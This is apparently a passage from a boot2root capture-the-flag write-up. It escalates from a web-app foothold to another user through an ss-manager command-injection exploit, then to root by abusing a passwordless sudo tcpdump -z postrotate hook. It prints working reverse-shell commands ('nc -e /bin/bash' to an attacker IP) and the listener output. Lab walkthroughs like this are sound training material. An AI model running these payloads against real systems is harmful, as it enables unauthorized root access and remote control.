Enumeration

After getting back our reverse shell from the exploited web app, we need to start enumeration. A couple of things jumped out at me as important: there’s another user on this box aside from nodeamin (the user we got back from the web app), and root appears to have started some kind of network process that’s running as this other user. I didn’t know what ss-manager was, but after some casual googling, we find out that it appears to be some kind of program for managing shadowsocks, a proxy server of some kind. More importantly, there’s an exploit where ss-manager will execute code if it’s delivered over the UDP port that the process listens to on 127.0.0.1. Details here: https://www.exploit-db.com/exploits/43006/.

[nodeadmin@localhost ~]$ cd /home/
cd /home/
[nodeadmin@localhost home]$ ls
ls
fireman  nodeadmin
[nodeadmin@localhost home]$ ps aux | grep fireman
ps aux | grep fireman
root       834  0.0  0.1 301464  4520 ?        S    15:25   0:00 su fireman -c /usr/local/bin/ss-manager
fireman    848  0.0  0.0  37060  3888 ?        Ss   15:25   0:00 /usr/local/bin/ss-manager
nodeadm+   931  0.0  0.0 213788  1008 pts/0    S+   15:25   0:00 grep --color=auto fireman
[nodeadmin@localhost home]$

Based on the info about the exploit, we set up another listener and then invoke the following command:

[nodeadmin@localhost home]$ echo 'add : { "server_port" : 8003, "password" : "test", "method" : "|| nc -e /bin/bash 192.168.219.4 4444 ||" }' | nc -u 127.0.0.1 8839
<sh 192.168.219.4 4444 ||" }' | nc -u 127.0.0.1 8839
[nodeadmin@localhost home]$
duder@duder-VirtualBox:~$ sudo nc -nlvp 4444
[sudo] password for duder:
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.219.3] port 4444 [tcp/*] accepted (family 2, sport 47334)
python -c 'import pty; pty.spawn("/bin/bash")'
[fireman@localhost root]$

Ok, so we haven’t gotten root, but as expected, we’ve at least been able to jump to another user account. Hopefully this one gives us a few more options than nodeadmin. I restart the enumeration process, and notice what could be a method of breaking out to root. Trying sudo -l gives us the following:

[fireman@localhost root]$ sudo -l
Matching Defaults entries for fireman on localhost:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
    LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on localhost:
    (ALL) NOPASSWD: /sbin/iptables
    (ALL) NOPASSWD: /usr/bin/nmcli
    (ALL) NOPASSWD: /usr/sbin/tcpdump
[fireman@localhost root]$

What should immediately draw our attention is that we have access to run three commands as root without providing a password. I went looking for break-out methods regarding the first two and couldn’t find anything. I consulted the man pages for tcpdump and noticed the following:

-z postrotate-command
    Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2. 
    Note that tcpdump will run the command in parallel to the capture, using the lowest priority so that this doesn't disturb the capture process. 
    And in case you would like to use a command that itself takes flags or different arguments, you can always write a shell script that will take the savefile name as the only argument, make the flags & arguments arrangements and execute the command that you want. 

This looks pretty promising. After some trial and error reading the man pages and experimenting with various commands, I was finally able to get a reverse shell. Just to briefly go over the options: -z invokes my script, which just invokes nc back to another listener I’ve set up, -G 1 rotates to a new file after one byte, -c 1 stops after getting one byte and -Z “drops” permissions to root to ensure we actually execute the post rotate command with elevated permissions.

[fireman@localhost ~]$ echo '#!/bin/bash' >> test.sh
[fireman@localhost ~]$ echo 'nc -e /bin/bash 192.168.219.4 5555' >> test.sh
[fireman@localhost ~]$ chmod 777 test.sh
[fireman@localhost ~]$ sudo tcpdump -z /home/fireman/test.sh -w /tmp/pack.pcap - G 1 -c 1 -Z root
<fireman/test.sh -w /tmp/pack.pcap -G 1 -c 1 -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
1 packet captured
7 packets received by filter
0 packets dropped by kernel
[fireman@localhost ~]$
duder@duder-VirtualBox:~$ sudo nc -nlvp 5555
[sudo] password for duder:
Listening on [0.0.0.0] (family 0, port 5555)
Connection from [192.168.219.3] port 5555 [tcp/*] accepted (family 2, sport 3647                                                                                                                                   0)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@localhost fireman]# cd /root
cd /root
[root@localhost ~]# cat flag.txt
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.

+-----------------------------------------------------------------------------+
| |       |\                                           -~ /     \  /          |
|~~__     | \                                         | \/       /\          /|
|    --   |  \                                        | / \    /    \     /   |
|      |~_|   \                                   \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /                                /  /  | \     /  \          /\|
|~~  |   :  | /                                 ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+

                FLAG: kre0cu4jl4rzjicpo1i7z5l1

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2roo                                                                                                                                   t.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther
[root@localhost ~]#